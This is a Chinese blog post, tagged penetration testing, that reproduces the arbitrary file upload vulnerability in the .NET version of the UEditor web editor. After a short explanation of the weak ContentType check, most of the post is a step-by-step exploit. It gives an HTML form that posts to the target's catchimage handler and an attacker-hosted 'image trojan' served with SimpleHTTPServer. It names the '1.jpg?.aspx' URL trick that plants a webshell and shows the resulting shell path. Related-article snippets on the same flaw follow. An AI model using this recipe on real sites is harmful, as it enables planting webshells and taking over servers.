UEditor .Net版本任意文件上传漏洞

最新推荐文章于 2024-09-16 07:17:23 发布
最新推荐文章于 2024-09-16 07:17:23 发布
阅读量1.2k 收藏 3
点赞数 1
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44146996/article/details/110641105
版权

UEditor .Net版本任意文件上传漏洞

一、漏洞介绍
Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。
漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传。
Crawler方法对source[]的检查仅仅是一个ContentType

if (response.ContentType.IndexOf("image") == -1)
{
State = "Url is not an image";
return this;
}

在这里插入图片描述
二、漏洞复现
1、可以利用post方法直接上传文件到目标网站

<form action="http://IP:port/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit"/>
</form>

在这里插入图片描述
2、生成图片马
1.jpg
3、开启web服务
python -m SimpleHTTPServer 8888
4、在shelladdr输入地址
http://X.X.X.X:8888/1.jpg?.aspx
5、上传成功
在这里插入图片描述
6、小马地址
http://ip:port/ueditor/net/upload/image/20201127/6374211044232448561123135.asp
7、连接小马
在这里插入图片描述

MD@@nr丫卡uer
关注
UEditor 任意文件上传漏洞
mei_13的博客
07-08 1万+
1 漏洞简介 1.1 漏洞描述 Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。 1.2 影响范围 该漏洞影响UEditor.Net版本,其它语言版本暂时未受影响。 1.3 漏洞原理 漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达
网站漏洞修复之UEditor漏洞 任意文件上传漏洞
网站安全资讯
08-30 3132
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文...
实战纪实 | 编辑器漏洞Ueditor-任意文件上传漏洞 (老洞新谈)
zkaqlaoniao的博客
04-12 1万+
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
ueGetshell.py:UEditor .NET GetShell漏洞检测利器
最新发布
gitblog_00734的博客
09-16 557
ueGetshell.py:UEditor .NET GetShell漏洞检测利器 ueditor-getshell ueditor .net getshell 项目地址: https://gitcode.com/gh_mirro...
[应用漏洞]UEditor .NET版本任意文件上传漏洞
不忘初心,护天下安全!
07-23 1633
一、UEditor
ueditor 文件上传漏洞_UEditor .Net版本任意文件上传漏洞
weixin_30095343的博客
02-22 597
报告编号: B6-2018-082202报告来源: 360CERT报告作者: 360CERT更新日期: 2018-08-220x00 漏洞背景UEditor 是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。0x01 漏洞影响该漏洞影响UEditor.Net版本,其它语言版本暂时未受影响。0x02 ...
UEditor .net版本任意文件上传
qax
11-22 1108
UEditor .net版本任意文件上传 简介 ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文本编辑器,近几年很少被曝出漏洞,事情没有绝对的,总会有漏洞,这次被曝出的漏洞.net版本的,其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net
实战 UEditor 任意文件上传漏洞
sweelg的博客
09-08 1792
漏洞影响UEditor.Net版本,其它语言版本暂时未受影响 影响版本 1.4.3.3 .NET
开发知识点-dotnet/.Net+C#/CSharp
aming小老弟
07-01 1969
NET(读作"dot net")是由微软公司开发的一种广泛使用的软件开发平台。它提供了一个统一的编程模型,用于构建各种类型的应用程序,包括桌面应用、Web 应用、移动应用和云服务。.NET 平台包括一系列的工具、库和语言,其中最常用的编程语言包括C#、VB.NET 和 F#。这些语言可以与.NET提供的大型类库结合使用,以实现各种功能,如数据访问、GUI开发、安全性、网络通信等。
UEditor编辑器任意文件上传
08-31
- *1* *2* [Ueditor编辑器任意文件上传漏洞](https://blog.csdn.net/m0_51468027/article/details/126077427)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt...
UEditor .Net版本任意文件上传漏洞复现
m0_37638874的博客
06-08 3514
  漏洞背景   漏洞影响   漏洞利用   漏洞分析漏洞背景漏洞影响漏洞利用首先准备一个html文件用来做post提交 action处填写网站的路径 另外:enctype="application/x-www-form-urlencoded"什么意思?打开html后如下 这个时候我们需要一台服务器用来放图片木马,服务器可以去阿里云、华为云等申请免费的我们准备一张的图片跟一个小马,小马代码如下 用命令合成图片木马 我们把此木马上传到我们的服务器,记住服务器图片路径在之前的里填写如下参数 是我们服务器的地址后
ASP.NET 上传程序(支持上传类型选择)防漏洞(c#)
06-04
ASP.NET 上传程序(支持上传类型选择)防漏洞(c#)
任意上传漏洞演示
03-07
讲述了任意上传漏洞以及一句话木马:
ueditor .net 配置
01-20
百度ueditor .net 基本配置好的
ueditor任意文件上传漏洞与解决方案
菜鸟成长史
08-02 1704
是一款颇为老旧的富文本编辑器,曾经普遍流行过所以在一些老的项目里面,还会存在。但是该项目到目前为止已经永久停止更新,所以当发现漏洞时,只能自己维护。最好停止使用并更换富文本编辑器组件。
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
Boom!脑洞大爆炸的博客
07-07 7394
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
.net fileupload批量上传可删除_Web安全(一)文件上传漏洞[一]
weixin_39644377的博客
11-24 252
点击上方蓝字关注!注:本篇文章为个人学习笔记仅供学习交流。文件上传漏洞概述文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、改头像、分享图片等。文件上传漏洞是在开发者没有做充足验证(包括前端,后端)情况下,允许用户上传恶意文件,这里上传的文件可以是木马、病毒、恶意脚本或者Webshell等。实验环境搭建下载并安装docker进入www.docker.c...
Ueditor编辑器任意文件上传漏洞
热门推荐
m0_51468027的博客
07-30 1万+
一文学习Ueditor编辑器任意文件上传漏洞(部署环境到漏洞复现)
ueditor .net 1.3.6 上传文件图片报500
12-22
ueditor .net 1.3.6 是一个用于上传文件和图片的插件,当出现上传文件图片报500的情况时,通常是由于服务器端出现了错误。这种情况可能是由于服务器配置问题、权限问题或者代码问题导致的。 首先,可以尝试检查...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值